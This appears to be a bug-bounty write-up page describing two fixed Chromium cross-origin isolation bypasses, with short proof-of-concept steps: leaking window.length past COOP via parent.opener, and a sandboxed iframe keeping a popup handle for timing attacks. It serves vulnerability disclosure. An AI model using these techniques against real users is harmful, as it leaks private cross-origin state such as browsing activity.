Writeups

Leaking window.length without opener reference (Awarded $2000)

It allowed leaking window.length from a COOP protected page via parent.opener.length

1. https://example.com/ run open(); // cross-origin page
2. opener.location = 'https://first-party-test.glitch.me/?coop=same-origin'; // Page with COOP
3. let f = document.createElement('iframe'); f.src = "https://example.org"; document.body.appendChild(f); // Must be cross origin
4. In the context of the iframe, do parent.opener.length. To get a new length, just create a new cross-origin iframe.

This issue was fixed in https://issues.chromium.org/40059056

COOP pages got blocked when coming from a “null” origin but didn’t get severed (Awarded $3000)

The iframe had access to “w”, which could be used to do navigation-based timing attacks.

<iframe
  srcdoc="<script>w = open('https://myactivity.google.com/myactivity')</script>"
  sandbox="allow-scripts allow-popups"></iframe>

This issue was fixed in https://issuetracker.google.com/40057526

Improve this page Default Random Basic Light Cyberpunk Code Matrix Blueprint Redacted Glitch Old Terminal Gradient Comic Base64 Emoji Minecraft Flip 🦆 Rainbow text Typoifier Summarizer AI Audio Spoof Oceanic Depths Retro Gamification NoScript